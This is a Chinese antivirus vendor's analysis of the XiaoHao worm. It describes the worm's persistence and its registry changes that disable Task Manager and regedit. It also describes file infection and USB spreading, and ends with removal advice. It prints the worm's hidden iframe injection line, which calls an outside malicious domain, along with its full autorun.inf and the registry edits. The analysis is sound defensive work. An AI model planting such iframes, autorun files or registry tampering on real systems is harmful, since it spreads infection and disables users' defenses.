该程序是使用VC编写的蠕虫程序,由微点主动防御软件自动捕获,捕获前文件名为XiaoHao.EXE,程序未加壳,长度为16,896字节,图标为,病毒扩展名为exe,主要通过网页木马、文件捆绑、移动存储介质方式传播,病毒主要感染网页文件和扩展名为.exe的文件。
该蠕虫程序被执行后,拷贝自身到目录%systemroot%\system32下,重命名为exloroe.exe;将exloroe.exe拷贝到目录C:\Documents and Settings\All Users\「开始」菜单\程序\启动下,以达到和系统一起启动的目的;
修改如下注册表键值实现禁用任务管理器、禁用注册表编辑器、隐藏病毒文件;
| Quote: |
项:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr\
健值:DisableTaskMgr
指向数据:01
项:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
健值:DisableRegistryTools
指向数据:01
项:HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
健值:CheckedValue
指向数据:01
项:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
健值:ShowSuperHidden
指向数据:00 |
|
修改系统时间使部分杀毒软件不能正常使用;枚举磁盘查找所有文件类型判断扩展名为htm、html、asp、aspx、php、jsp的文件时,在文件内插入<iframe src=hxxp://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe>,解密后为hxxp://www.158dm.cn/a1.htm;枚举磁盘感染所有文件扩展名为exe文件;之后去访问网站hxxp://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%62%64%2E%68%74%6D,解密后为hxxp://www.158dm.cn/bd.htm;遍历盘符在各分区和移动存储介质中释放病毒文件Xiaohao.exe和autorun.inf,使用Windows自动播放功能来传播病毒。
autorun.inf文件内容如下:
| Quote: |
[Autorun]
open=Xiaohao.exe
shell\open=打开(&O)
shell\open\Command=Xiaohao.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe |
|
安全提示
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理;
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Worm.Win32.XiaoHao.a”,请直接选择删除。
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放,具体操作步骤:开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新,及时打好漏洞补丁。
www.newjian.com
您的位置: